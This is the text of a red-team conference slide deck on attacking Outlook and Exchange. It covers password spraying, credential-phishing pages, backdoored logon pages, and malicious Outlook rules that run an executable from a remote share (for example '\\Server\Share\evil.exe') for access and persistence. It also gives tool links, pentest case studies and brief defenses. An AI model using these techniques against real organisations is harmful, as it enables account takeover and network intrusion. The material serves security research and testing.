Outlook & Exchange for the Bad Guys

Outlook & Exchange for the Bad GuysITs Always fun breaking the rulesNick Landers / @monoxgas / Silent Break Security

1

> getuidNick Landers (@monoxgas)Security Consultant at Silent Break SecuritySalt Lake City, Utah, USHacking for 8 years, 2 professionallyMy Loves:Writing Windows malware (slingshot/throwback)Coding with C++, Python, or PowerShellSecurity Research for the Red SideLong walks on the beach

Nick Landers / @monoxgas / Silent Break Security

Tonights AgendaExchange OverviewReconCredential HarvestingOutlook RulesExploitation DetailsDemo!Questions

Nick Landers / @monoxgas / Silent Break Security

Currently supported versions: 2007, 2010, 2013, 2016Office 365 / Outlook.comRemote Access ProtocolsExchange Web Services (EWS) SOAP over HTTPOutlook Anywhere RPC over HTTPMAPI over HTTP (Exchange 2013+)Exchange ActiveSync (EAS) HTTP/XML High latency/Low bandwidthFunctionsAutoDiscover Fast collection of Exchange configurations, supported protocols, and service URLsOutlook Web App (OWA) Minimal E-Mail client available via the web http://mail.org.com/owa Global Address List (GAL) LDAP/Active Directory

Nick Landers / @monoxgas / Silent Break Security

ReconGoal: Collect E-Mails, usernames, and (maybe) passwords from public resourcesSources:Search engines (Google, Bing, etc.)Company Websites DNS brute-forcing to discover subdomainsPublic Websites (LinkedIn, GitHub)Database Dumps (leakedsource, haveibeenpwned)Active Directory For lateral movement and segmentation bypassingTooling:Discover - https://github.com/leebaird/discover (Lee Baird)Passive: ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ngActive: nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute, and WhatwebFOCA - https://www.elevenpaths.com/labstools/foca/index.html LinkedIn Scraper - https://github.com/wpentester/Linkedin_profiles (Hans Petrich)HackerTarget - https://hackertarget.com/ip-tools/

Nick Landers / @monoxgas / Silent Break Security

Collecting CredentialsBrute Forcing TechniquesOWA Black Hills Security Password Spraying w/ Burp - http://www.blackhillsinfosec.com/?p=4694EWS ShellIntel PowerShell Toolkit - https://github.com/Shellntel/OWA-Toolkit NTLM HTTP Auth Python Requests - https://github.com/requests/requests-ntlm Use a targeted E-Mail list with common passwords Summer2016, Password1, etc.

Nick Landers / @monoxgas / Silent Break Security

Collecting Credentials pt. 2Credential Harvesting Attacks via E-MailImpersonate target company logon page (OWA, Office 365, etc.)No payload to burn + Blend with the spam= Attacks can be scaled up (5-10 vs 100-200 targets)

External Site Compromise (WordPress, LiveAgent, etc.)No longer useless for gaining internet network access!Credential re-use is VERY commonBackdoor logon pages with JavaScript to steal credentialsGrab passwords from databasesSocial EngineeringNick Landers / @monoxgas / Silent Break Security

Outlook Rules OverviewA rule is an action that Outlook for Windows runs automatically on incoming or outgoing messages. You choose what triggers the rule as well as the actions the rule takes. MicrosoftRules can be created:Server side (OWA, Outlook.com)Client side (Outlook)Often not compatible due to subtle differences in the usage of rule propertiesRule action order:Server side actions (move mail to folder)Client side actions (print a message)Rules are stored with the exchange server. Any new Outlook instance receives all existing rulesWhen a client side action is needed, deferred action message (DAM) is sent to client w/ rule ID

Nick Landers / @monoxgas / Silent Break Security

Rule Actions

That looks promising!Nick Landers / @monoxgas / Silent Break Security

Peeking InsideNick Landers / @monoxgas / Silent Break Security

A Deeper LookNick Landers / @monoxgas / Silent Break Security

ShellExecuteEx

lpVerb The set of available verbs depends on the particular file or folder. Generally, the actions available from an object's shortcut menu are available verbs. This parameter can beNULL, in which case the default verb is used if available. If not, the "open" verb is used.Can be viewed/modified in HKEY_CLASSES_ROOTlpFile The address of a null-terminated string that specifies the name of the file or object on whichShellExecuteExwill perform the action specified by thelpVerbparameter.lpParameters Optional. The address of a null-terminated string that contains the application parameters.Nick Landers / @monoxgas / Silent Break Security

Exploitation ChallengesRequires valid account credentials along with Exchange service accessRecon & Brute ForcingRPC/MAPI over HTTPNo command line argumentsNeed a local file on disk for Outlook to open UNC to the rescue! (\\Server\Share\evil.exe)Local SMB share (Kali Linux, existing windows share) Internal pentesting/pivoting/persistenceWebDAV share Accessible via UNC path HTTP with proxy awarenessA file type which can give us code execution with ShellExecuteBAT, EXE, PIF, VBS, JS, HTA, LNK, etc.Target needs Outlook open to receive the DAM and execute the attackNick Landers / @monoxgas / Silent Break Security

Use CasesInitial Access to a target networkRelatively easy to collect E-Mail credentials externallyPivot to workstation without local admin privilegesBypass network segmentationPersistence:Stealthy Obscure technique with minimal tooling available for detection/monitoringLong-Term Linked to E-Mail profile, not workstation. Persistence across a DFIR wipeDrop a executable onto an internal file shareLoad rule into many E-Mail accounts, trigger with one E-MailNick Landers / @monoxgas / Silent Break Security

State of thingsRulz.py Build malicious RWZ files for importing into Outlook (monoxgas)https://gist.github.com/monoxgas/7fec9ec0f3ab405773fc Ruler MAPI over HTTP to quickly sync rule file without building complete profile (SensePost)https://github.com/sensepost/ruler Xrulez Use local Outlook profiles to import malicious rule for persistence (MRW Labs)https://github.com/mwrlabs/XRulez

Nick Landers / @monoxgas / Silent Break Security

Demo!Pop a shell with E-Mail!Nick Landers / @monoxgas / Silent Break Security

Nick Landers / @monoxgas / Silent Break Security

Case Study #1Black-Box Penetration Test for an organizationDiscovered 0-Day in externally hosted LiveAgent software for support chatCompromised SQL database and used tokens to login to the web interfacePlaced custom HTML on the footer of the logon page to steal user credentialsPassword Re-Use to get into an E-Mail accountOutlook attack to pivot into the environmentLateral movement and privilege escalation to Domain AdminNick Landers / @monoxgas / Silent Break Security

Case Study #2Black-Box Penetration Test for an organizationCredential brute-forcing to find weak user loginOutlook attack to gain initial access to the networkSecurity team discovered the compromise, changed user password, wiped workstationUse previously synced rule with external E-Mail to gain access to the network AGAINLateral movement and privilege escalation to get Domain Admin

Phishing payloads are DEAD! Long live the Outlook Attack!Nick Landers / @monoxgas / Silent Break Security

What Now?Future ResearchAbuse mso.dll/Outlook to avoid argument limitations with ShellExecuteModify Ruler by SensePost to include support for MAPI over RPC over HTTP (2007/2010)Build Pass the Hash support into tooling so NTLM hashes can be used to pivot internallyUse Named Pipes as a file replacement for In-Memory pivotingBackdoor/Patch mso.dll on disk for Outlook persistence without modifying server-side profileDefenses:Disable WebDAV outbound at the firewallMonitor process creation from Outlook and/or app whitelistingMonitor Exchange logs for rule sync events from outside of the network?

Nick Landers / @monoxgas / Silent Break Security

Questions?

Nick Landers - @monoxgasSilent Break Securitynick@silentbreaksecurity.comNick Landers / @monoxgas / Silent Break Security